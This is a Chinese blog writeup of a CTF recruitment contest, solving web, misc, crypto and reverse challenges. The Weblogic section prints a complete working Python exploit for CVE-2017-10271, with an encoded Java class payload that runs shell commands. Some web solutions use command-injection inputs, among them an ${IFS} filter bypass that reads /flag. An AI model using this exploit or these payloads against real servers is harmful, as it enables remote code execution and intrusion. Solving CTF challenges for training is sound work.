弱口令实验室招新赛Writeup

最新推荐文章于 2023-08-23 09:55:47 发布
最新推荐文章于 2023-08-23 09:55:47 发布
阅读量924 收藏
点赞数 2
文章标签: python web安全 网络安全 php 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/t235336456/article/details/128074686
版权

解题状况
Web

签到小能手

开胃菜

小镇做题家

Discuz

Weblogic
MISC

签到

Easymisc

奇怪又不奇怪

cookie怎么分

吉他

Easyso
Crypto

82.83.85

Snake

Cryptosos

babyrsa RSbaby

What

奇怪又奇怪
Re

Check

MD5

LookThis
Web

1.签到小能手

1074ecdac5df4a78a665fd368e6d7c67.png

11abb54c02e642038d613816e9bae6b3.png 

 

打开容器以后使用dirsearch扫,扫到有index.php.bak文件,访问这个文件以后即可得到flag
70f908ca30474832b2acc63fd5e7a72d.png

 

Flag:qsnctf{4fb0d76d-40e1-4f40-85ca-f32e35562c4c}

2.开胃菜

b375fd3c3b1e4535aeb22e97df620955.png

 


直接输入?1=cat /flag即可得到flag
Flag:qsnctf:{1ef1dcf8-6542-4955-ac88-79dc0ea3e9e3}

3.小镇做题家

2034cc3d81da45d2ac5804d775d9352b.png

 


打开容器,直接使用dirsearch扫

652898b3471a4f8aabd9946fc1141378.png

发现有robots.txt,访问这个文件

da78c2a62cd94c6f982c55a178988f18.png

发现有/GAME我们再次使用dirsearch扫

a15efacbd14d41238c0d4494e99a1283.png

这次扫码得到index.html访问这个页面

b90659475d55412ea5430d330719fe8e.png

直接F12查看源码看到有个snake.js

0ecfb8153983421e87006aad93122885.png
 

 访问这个snake.js发现有两个base64分别解码得到

恭喜你,题目的关键在于/GAME/f14g_in_there_hha/index.php中!

e6810e2914b84cfea5e7d22c4587f5dc.png

 

访问这个页面发现让输入payload

直接输入输入payload=cat${IFS}/fla*即可得到flag

7823684539e74b2da4339e645a7ba1dd.png

 

Flag:qsnctf{b72cd851-7c665-4109-85db-172c0ebbea70}

 

4.Discuz

044152722aee41798e4897a0c411e1f4.png

 

打开默认板块可以看出来这个是discz7.2版本

上网搜索发现这个有漏洞

根据网上的漏洞我们打开到这个界面

5158d620849f44a6987ae467538e9dc5.png

 

修改cookie

60904a7820c04f96bc2350909af26d91.png

 

发送请求以后即可看到phpinfo界面搜索flag可以搜索到flag

c382a374a5c4488494aacd46a768c24e.png

 

Flag:qsnctf{8bb60cf1-53d9-4741-9c42-af8c7e14d4f0}

 

5.Weblogic

 

打开这个容器

f007d2aa3a434f1a8f995fb13df13b65.png

 

根据题目名称可知有漏洞

CVE-2017-10271

代码如下

1. import requests  

2.   

3.   

4. headers = {  

5. 'user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36 Edg/80.0.361.54',  

6. 'Accept': 'textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',  

7. 'Upgrade-Insecure-Requests': '1',  

8. 'Content-Type': 'text/xml'  

9. }  

10. def Webogic_XMLDecoder_poc(url):  

11. # 输入url:  

12.       

13. posturl=url+'/wls-wsat/CoordinatorPortType'  

14. data = ''''' 

15. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 

16. <soapenv:Header> 

17. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 

18. <java> 

19. <void class="weblogic.utils.Hex" method="fromHexString" id="cls"> 

20. <string>0xcafebabe0000003200670a001700350800360a003700380a0039003a08003b0a0039003c07003d0a0007003508003e0a0039003f0a003900400b004100420800430800440800450800460700470a001100480a001100490a0011004a0a004b004c07004d07004e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301001e4c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578703b010003736179010029284c6a6176612f6c616e672f537472696e673b294c6a6176612f696f2f496e70757453747265616d3b010003636d640100124c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b0100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b01000d537461636b4d61705461626c6507004f07005001000a457863657074696f6e7307005101000a536f7572636546696c6501000b586d6c4578702e6a6176610c001800190100076f732e6e616d650700520c0053005407004f0c0055005601000377696e0c005700580100136a6176612f7574696c2f41727261794c697374010004244e4f240c0059005a0c005b005c0700500c005d005e0100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c0018005f0c006000610c006200630700640c0065006601001c636f6d2f737570657265616d2f6578706c6f6974732f586d6c4578700100106a6176612f6c616e672f4f626a6563740100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100136a6176612f6c616e672f457863657074696f6e0100106a6176612f6c616e672f53797374656d01000b67657450726f7065727479010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a01000a73746172747357697468010015284c6a6176612f6c616e672f537472696e673b295a010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0021001600170000000000020001001800190001001a0000002f00010001000000052ab70001b100000002001b00000006000100000007001c0000000c000100000005001d001e00000001001f00200002001a0000016f000300070000009c043d1202b800034e2dc600112db600041205b60006990005033dbb000759b700083a042b1209b6000a99001319042b07b6000bb9000c020057a700441c9900231904120db9000c0200571904120eb9000c02005719042bb9000c020057a700201904120fb9000c02005719041210b9000c02005719042bb9000c020057bb0011591904b700123a05190504b60013571905b600143a061906b60015b000000004001b0000004a001200000012000200130008001400180015001a00180023001a002c001b003c001c0040001d004a001e0054001f00600021006a002200740023007d002600880027008f002800960029001c0000004800070000009c001d001e00000000009c0021002200010002009a00230024000200080094002500220003002300790026002700040088001400280029000500960006002a002b0006002c0000000c0001002300790026002d0004002e000000110004fd001a0107002ffc0021070030231c0031000000040001003200010033000000020034</string> 

21. </void> 

22. <void class="org.mozilla.classfile.DefiningClassLoader"> 

23. <void method="defineClass"> 

24. <string>com.supeream.exploits.XmlExp</string> 

25. <object idref="cls"></object> 

26. <void method="newInstance"> 

27. <void method="say" id="proc"> 

28. <string>echo CVE-2017-10271;cat /flag</string> 

29. </void> 

30. </void> 

31. </void> 

32. </void> 

33. <void class="java.lang.Thread" method="currentThread"> 

34. <void method="getCurrentWork"> 

35. <void method="getResponse"> 

36. <void method="getServletOutputStream"> 

37. <void method="writeStream"> 

38. <object idref="proc"></object> 

39. </void> 

40. <void method="flush"/> 

41. </void> 

42. <void method="getWriter"><void method="write"><string></string></void></void> 

43. </void> 

44. </void> 

45. </void> 

46. </java> 

47. </work:WorkContext> 

48. </soapenv:Header> 

49. <soapenv:Body/> 

50. </soapenv:Envelope> 

51. '''  

52.        

53. print (posturl)  

54. r=requests.post(posturl,data=data,headers=headers,timeout=5)  

55. print (r.text)  

56. if __name__ == '__main__':  

57. url = "http://f74e25f4-9c00-4f10-bad9-5c19601d98ca.recruit.qsnctf.com:8080/"  

58. Webogic_XMLDecoder_poc(url)

1104ed3b37d04c0d9a2ebbeef37a3201.png

 运行后得到flag

Flag:qsnctf{19b9858b-a266-46d2-8f87-31057d8b4bb2}

MISC

6.签到

954ad801d9774296a84fb7b1fa8b0e4f.png

 

根据题目说的linux操作系统

发送cat /flag即可得到flag

 

5518b04e12f847178cbe227141fd6821.png

 

 

Flag:qsnctf{ba3c9f2e-56a8-416b-bc5d-dd379dede335}

7.Easymisc

下载后将后缀改成zip

936c3e39ea0f464da9812e065cc34e58.png

 

提取出document.xml文件然后找到一串base64加密后的数据解码

7be6baa5cee04e7b84cd0ab8385b33ca.png

326c1432388744278c96efaded35fe00.png 

 再次使用hex解密

9968ba0735f242e8bc2b91435d602d47.png

 解密后得到flag

Flag:qsnctf{177af0b9-fbed-4a1e-a09f-4a580940c28c}

 

8.奇怪又不奇怪

93f740e3b16545859401073d41ab19dc.png

 使用对照表得到flag

Flag:qsnctf{MOXINAHJACK}

 

9.cookie怎么分

 

使用whireshark导出HTTP

eb8bb7658f8d444facc50548365f80fb.png

ac3bc6e367be48db9986153379e42011.png 

 

看到箭头所指文件的名字发现是base64加密特征,拿去解密得到一部分的flag

df81b65bc75c44149e35d2e4a02da745.png

 

导出的里面有几个图片使用binwalk可以提取出两个压缩包然后可以得到两个图片

3d50195349854565b144118e17b96b1b.png

 

其中有个图片高度有错我们使用工具修改

使用orc提取出文字

base64转图片以后就是另一半flag了

8743c9ab8a504bc88ac82f665eb3e9a0.png

 

Flag:qsnctf{b5512946-d7ac-45c9-afd0-a3f28ba547ea}

 

10.吉他

将第一个zip压缩包解压得到一个aac后缀的文件

使用010打开搜索 63 74 66

a63f77cee9d246d4b112665f544899b6.png

 

得到的是qnsctf{74e0df3c-

提交flag的时候要将n和s换位置

76c6f32fad2b44f7a563a9b03aea6cb2.png

 

发现7z后缀的有加密看到题目给的hint,就试了试jita发现密码对了。

解压后发现是一个图片,我们使用steghide

f87eba39620248d0810d1e21d699fbe1.png

 

使用jita发现是错误的,想起使用吉他的英文guitar

695804f2ad7448cb9a419cf24da92cc7.png

 

得到一点flag

4b2da3de9dcd44c794d445342ca2f008.png

 使用010打开吉他.jpg发现文件尾部有flag

最后将3段flag合到一起就是flag了

Flag:qsnctf{74e0df3c-049f-46dc-823a-9c33565c6bde}

 

11.Easyso

ee86edf20b2d40e4878309f5569ebe8b.png

 

打开后使用吸管工具右键图片,然后拷贝颜色的十六进制代码

拷贝出来以后是

8b8b61 000000 8b8b61 000000 8b8b70 000000 8b8b6a 000000 8b8b65 000000 8b8b73

使用hex解码

5086dc0a03f344ca981cf10d09273ed8.png

 得到flag

qsnctf{appjes}

 

Crypto

 

12.82.83.85

1e18f70fc079431a926ce615c0ffc248.png

 直接使用rsa工具得到flag

Flag:qsnctf{RSA_SOEASY!}

 

13.snake

24aaf4adc4c045f7a0c2ca24be03f134.png

 

根据题目描述说象形,再根据题目蛇

47a521689e6845d88ff4ae23745a308d.png

 

按着这个顺序输入到hex解码的地方即可得到flag

1415bf21483f4ad9b58aeb4092f272d4.png

 

Flag:qsnctf{399b10cd-c3f9-491b-dfb5d03e4ce0}

 

14.cryptosos

这个题是仿射密码,直接使用脚本爆破即可得到flag

2471100d7ce14515802ff3025b7602ec.png

 下面是脚本

#暴力破解仿射密码

def decrypt():

    k1 = [1,3,5,7,9,11,15,17,19,21,23,25]

    n = 1

    ny = []

    for i in k1:

        while (i * n) % 26 != 1:

            n += 1

        ny.append(n)

 

    f = open('1.txt')

    w = open('plain08.txt','w')

    cipher = f.read()

    p = []

    for k1 in ny:

        for k2 in range(1,27):

            p.append('\n 逆元='+str(k1)+' k2='+str(k2)+' ')

            # plain = ''.join('\n 逆元='+str(k1)+'k2='+str(k2)+' ')

            for i in range(len(cipher)):

                #小写字母

                if cipher[i].islower():

                    t1 = ord(cipher[i])-97-k2

                    if t1 < 0:

                        t1 +=26

                    p.append(chr((k1 * t1)%26+97))

                #大写字母

                elif cipher[i].isupper():

                    t2 = ord(cipher[i])-65-k2

                    if t2 < 0:

                        t2 +=26

                    p.append(chr((k1 * t2)%26+65))

                #其他

                else :

                    p.append(cipher[i])

 

            plain = ''.join(p)  

    w.write(plain)

    print('解密完成!')

    f.close()

    w.close()

 

if __name__ == '__main__':

    decrypt()

Flag:qsnctf{d990d395-f7b7-4eed-b084-a2f4590db34e}

 

 

 

15.babyrsa RSbaby

这个需要爆破e

from base64 import b64encode as b32encode

from base64 import b64decode

from gmpy2 import invert, gcd, iroot

from Crypto.Util.number import *

 

p = 185392927331398754034773152474166007097

n = 33047182186833739970146873552408478599841138065558351794468963853252513446871

c=20392798836838831460465406987101354448592610558736461081264936079945558905138

print ( c )

q = n // p

phi = (p - 1) * (q - 1)

for e in range (20000,50000):

    if gcd ( e, phi ) == 1:

        d = invert ( e, phi )

        m = pow ( c, d, n )

        flag=str(long_to_bytes(m))

        if 'qsnctf' in flag or 'flag' in flag :

            print(flag)

            print(e)

运行后得到flag

 

Flag:qsnctf{!RSA_SO_EASY$$}

 

16.What

71dedc1a7b8e4f60be5ff9b34c9a2163.png

 

因为qsnctf后包含了{}这两个符号,所以这个加密大概率不支持加密{}这样的符号。

我们尝试使用维吉尼亚密码解密

6d4926bde2844d11a8174066f3ffc0d4.png

 

由于key是三位,我们尝试使用ctf,qsn作为密钥尝试一下,解码以后的到flag

 

Flag:qsnctf{vigenerciphersoeasy}

 

17.奇怪又奇怪

第一层是base64

020ccda913914372a7b030d83bd2bf38.png

 0c2b2fa5062446cebf018147bc148d0d.png

 

第二层是DES密码是根据出题人猜出来的出题人是青少年ctf训练平台所以就猜到是qsnctf

998003993acb4d62b0c2e53ae816f398.png

 第三层是RC4密码还是qsnctf

38d0b3abb63041c78cb0c5f5317c97ef.png

 

最后一层还是RC4解码之后得到flag

Flag:qsnctf{b97c2a6d-c8a2-4bed-bbb9-e845ec58844f}

Re

 

18.Check

c96502bcc4cc48b1946dc2f0ba941676.png

 

直接使用ida打开搜索main函数

e0490ecef1624332b0c594305be5f4e0.png

 

写出脚本运行得到flag

1. #include <stdio.h>  

2.    

3. int main()  

4. {  

5.    

6. /* Write C code in this online editor and run it. */  

7. int v1[72];  

8. v1[0] = 113;  

9. v1[1] = 114;  

10. v1[2] = 108;  

11. v1[3] = 96;  

12. v1[4] = 112;  

13. v1[5] = 99;  

14. v1[6] = 125;  

15. v1[7] = 74;  

16. v1[8] = 56;  

17. v1[9] = 113;  

18. v1[10] = 59;  

19. v1[11] = 101;  

20. v1[12] = 83;  

21. v1[13] = 65;  

22. v1[14] = 97;  

23. v1[15] = 121;  

24. v1[16] = 117;  

25. v1[17] = 78;  

26. v1[18] = 107;  

27. v1[19] = 124;  

28. v1[20] = 97;  

29. v1[21] = 52;  

30. v1[22] = 107;  

31. for (int i = 0; i <= 23; ++i )  

32. v1[i + 24] = i ^ v1[i];  

33. for(int i=24;i<=47;i++)  

34. printf("%c",v1[i]);  

35. } 

Flag:qsnctf{M0x1n_Love_you!}

 

19.MD5

 

使用die找到这个字符串

61ff45ca7d9e43ad91a64f651812a570.png

 

根据题目可知最多7位

1. import hashlib  

2. part = 'qsnctf{'+a+’}’  

3. for a in range(1000000,9999999):  

4. msg = part +str(a)  

5. msg1 = hashlib.md5(msg.encode()).hexdigest()  

6. if msg1 == a4241bbfc6cab40e5b36b7a98c8621ed:  

7. print(msg)  

8. break 

Flag:qsnctf{5201314}

 

20.Lookthis

 

Apk文件下载下来第一步首先改后缀解压

5f2670d5e1f4434fb06cf6216cb30057.png

 

打开res然后找到apk图标存放的位置

6b8533047ae24f8faad0629c4a10e434.png

 

找到这个一个一个点开,点的过程中会发现有个文件夹里面有三张图片,其中一个就是flag

这个文件夹mipmap-xhdpi-v4

4a8ba2a01c6e4aaabec91edfb4e6ab60.png

 得到flag

Flag:qsnctf{8143a241-c31d-433b-ad51-b4807413b083}

 

 

 

 

 

Ra1nning
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
青少年CTFmisc 简简单单的题目
zx66661的博客
10-18 1176
青少年CTFmisc 简简单单的题目
qsnctf -web 第五届浙江省大学生网络与信息安全竞 吃豆人
weixin_68123535的博客
03-30 187
qsnctf-web 第五届浙江省大学生网络与信息安全竞 糖豆人WP
#再谈 CVE-2017-10271回显POC构造
weixin_30914981的博客
05-18 797
之前写过反序列化报错回显。 1、远程server放恶意jar包,服务器去远程server来请求恶意jar包 2、利用defineClass加载byte[]返回Class对象 从这里找到回显的poc,这个poc用的就是方法2. 详细POC如下: POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 127.0.0.1:7001 Accept-E...
青少年CTFqsnctf的部分WP
Fab1an的博客
08-23 500
这道题目涉及了一些基本的Web安全知识和PHP代码审计。让我来分步骤解释这个题目的解法:页面结构:代码开头通过HTML输出一个表单,要求用户输入一个 "key"。同时,代码会根据用户的输入在后台进行处理。表单提交:用户需要在表单中输入一个 "key",然后点击 "Submit" 按钮将数据提交到index.php这个页面。index.php因此,你需要在表单中输入经过Base64编码和URL编码的 "qsnctf",并将其解码为长度为6的 "key"。
[Reverse]2022口令安全 tea
qq_24481913的博客
12-24 180
TEA算法使用64位的明文分组和128位的密钥,它使用Feistel分组加密框架,需要进行 64 轮迭代,尽管作者认为 32 轮已经足够了。该算法使用了一个神秘常数δ作为倍数,它来源于黄金比率,以保证每一轮加密都不相同。但δ的精确值似乎并不重要,这里 TEA 把它定义为 δ=「(√5 - 1)231」(也就是程序中的 0×9E3779B9)
实验吧writeup Web方向
08-27
就是实验吧的一些writeup,,因缺思厅的绕过,让我进去,上传绕过, dvwa,简单的sql注入3
实验吧1867 writeup
10-24
实验吧1867-困在栅栏里的凯撒的解题思路和过程
2023 强网杯 Writeup
最新发布
01-29
CTF Writeup 2023 强网杯 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析...
[SECT2019] —writeup撰写.docx
11-28
writeup CTF
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
EasyMisc:EasyCrypt的其他开发
03-29
EasyCrypt的其他开发 该存储库包含其他EasyCrypt开发:
BUUCTF [安洵杯 2019]easy misc
m0_49025459的博客
08-26 406
先从图片下手吧,用foremost分离一下,分离出两张图片。这个很像一个原图,一个水印图,猜测是盲水印。然后看看拿个压缩包,算完发现前面的公式是7。看提示应该是11.txt,打开11.txt。把刚刚解出来的十六位和这个对照一下。猜测是字频,跑个大佬的脚本。解压压缩包有三个附件。base85再解一下。...
BUUCTF easy misc
wangjin7356的博客
12-25 1484
[安洵杯 2019]easy misc 有一个带密码的压缩包,一张图片和一个目录,翻翻看吧。 先从压缩包入手吧,看看有什么 发现有提示,根据提示算出答案为7。”7+NNULLULL,"是什么意思呢?试着解压也不对,暂时放一边。 再用binwalk分析小姐姐.png,没有发现什么东西,改用foremost得到两张png图片: foremost 小姐姐.png 用Stegsolve查看也没有看出所以然来。再看看read目录,有多个txt文档: 打开hint.txt,提示:hint:取前16个字符。搞不懂
java反序列化RCE回显研究
java276582434的博客
05-25 2465
总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义类中,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。 直接利用RCE将执行的命令写入服务器文件...
python写个简单的poc
hibari_18的博客
05-25 931
import requests import argparse Request头: header={ 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36', 'Content-Type':'text/xml' } 请求体内容: 三个单引号后不要换行,会报错。 data='''<?xml versi
青少年CTF训练平台 Web-Easy PingMe02
xingjinhao123的博客
10-22 1528
青少年CTF训练平台 Web-Easy PingMe02
攻防世界easy_misc
m0_62840741的博客
09-23 577
攻防世界easy_misc
第二届BMZCTF公开-easymisc
末初的CSDN博客
01-02 3745
文章目录题目设计解题步骤(Writeup) 题目设计 考察知识点:数据处理、wav文件头、高低振幅转换、LSB隐写 题目思路:逆序字节流数据->wav文件->高低振幅转换->LSB隐写->异或测试 以下是设计题目时所用到的脚本 文件转换二进制01数据 from binascii import * with open('1.png', 'rb') as f:#需要转换的文件 with open('bin.txt', 'w') as f1: hex_data = hexl
MISC总结——隐写术(二)
weixin_34269583的博客
07-30 1050
这一篇是继上一篇之后的另一篇关于隐写术在ctf比中常见的套路问题: 上一篇详情请见:https://www.cnblogs.com/lxz-1263030049/p/9388511.html 本文参考自:先知社区:https://xz.aliyun.com/t/1836 隐写术介绍: 隐写术是关于信息隐藏,即不让计划的接收者之外的任何人知道信息的传递事...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ra1nning

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值